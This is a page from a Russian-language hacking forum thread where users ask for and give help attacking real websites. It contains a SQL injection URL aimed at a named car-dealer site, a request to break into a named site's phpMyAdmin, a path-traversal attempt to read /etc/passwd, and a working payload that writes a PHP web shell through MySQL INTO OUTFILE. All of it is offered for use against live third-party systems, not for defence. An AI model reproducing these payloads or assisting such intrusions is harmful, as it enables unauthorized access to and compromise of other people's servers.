HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 447 из 2438 « Первая < 347397437 443 444 445 446 447 448 449 450 451 4574975479471447 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #4461  
Старый 03.01.2009, 23:19
qazer
Участник форума
Регистрация: 26.11.2008
Сообщений: 167
С нами: 9187493

Репутация: 112
По умолчанию
http://nismo.ru/phpmyadmin/tbl_create.php кто поможет зайти вот сюда?
 
Ответить с цитированием

  #4462  
Старый 04.01.2009, 00:05
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию
Цитата:
Сообщение от sabe  
подскажите как быть) как изменить тип
Нет скули, вообще
 
Ответить с цитированием

  #4463  
Старый 04.01.2009, 01:13
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
С нами: 9216251

Репутация: 30
По умолчанию
Приветствую.
Подскажите, можно ли залить шелл через phpMyAdmin?
Если сморозил глупость, sorry (:
 
Ответить с цитированием

  #4464  
Старый 04.01.2009, 01:52
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию
Цитата:
Сообщение от Pashkela  
Нет скули, вообще
Скуль есть.

sabe
Ты хочешь добится вывода? Ищи дркгой параметр, сдесь помоему глухо, похоже она слепая

Octave_Parango
SELECT '<?php system($c) ?>' FROM `table` INTO OUTFILE '/полный/путь/shell.php'
 
Ответить с цитированием

  #4465  
Старый 04.01.2009, 01:56
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами: 10109126

Репутация: 1980
По умолчанию
Можно, при условии что у тебя есть доступ к выполнению произвольных SQL-команд и пользователь MySQL имеет привилегию FILE.
Вот статья по теме:
https://forum.antichat.ru/showthread.php?p=437118
Также в некоторых версиях phpMyAdmin есть уязвимости, с помощью которых можно залить шелл.
http://letmegooglethatforyou.com/?q=phpmyadmin%20exploit
 
Ответить с цитированием

  #4466  
Старый 04.01.2009, 02:04
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию
sabe, это Oracle. Мне приходилось иметь дело с этой субд (в плане проведения инъекций) к сожалению безрезультатно (наверно я такой тупой). На античате есть статьи по сабжу

https://forum.antichat.ru/thread7157-%E8%ED%FA%E5%EA%F6%E8%FF+Oracle.html

https://forum.antichat.ru/thread7158-%E8%ED%FA%E5%EA%F6%E8%FF+Oracle.html

https://forum.antichat.ru/thread8009-%E8%ED%FA%E5%EA%F6%E8%FF+Oracle.html

Статьи на мой взгляд отвратительные. Вообще не читабельно (имхо). Еще есть мини статья от Подкащея вроде, но там все сбито в одну кучу. Просто так сказать некоторые особенности субд.

Желаю удачи
 
Ответить с цитированием

  #4467  
Старый 04.01.2009, 02:40
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами: 10109126

Репутация: 1980
По умолчанию
ElteRUS ты видимо не заметил отличную статью от [53x]Shadow по Oracle
http://forum.antichat.ru/showthread.php?t=40576
 
Ответить с цитированием

  #4468  
Старый 04.01.2009, 04:20
prescott
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
С нами: 9361826

Репутация: 115
По умолчанию
Код:
http://lada-auto.ru/cgi-bin/models.pl?model_id=6295171+union+select+1,null,to_char(213),null+from+sys.dual--%20&branch=tth
Помогите с ORACLE инъекцией. Не могу подобрать тип данных для третьего столбца. В чем ошибка?
 
Ответить с цитированием

  #4469  
Старый 04.01.2009, 09:11
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
С нами: 9361870

Репутация: 58
По умолчанию
при запросе index.php4?lang=1' выдает ошибку
Warning: main(lang/inc.lang1'.php): failed to open stream
при таком запросе index.php4?lang=/../../../../../../../../../../../../../etc/passwd%00 ошибка
Warning: main(lang/inc.lang/../../../../../../../../../../../../../etc/passwd
как я понял он не может найти папку inc.lang(( как правильно составить?))
 
Ответить с цитированием

  #4470  
Старый 04.01.2009, 10:01
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
С нами: 10254549

Репутация: 227
По умолчанию
j0ker13. Такого файла нет, в НИКСах вылазит ошибка (может не во всех). Если бы была винда. то ты бы смог прочесть файл
Последний раз редактировалось o3,14um; 04.01.2009 в 10:04..
 
Ответить с цитированием
Ответ
Страница 447 из 2438 « Первая < 347397437 443 444 445 446 447 448 449 450 451 4574975479471447 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.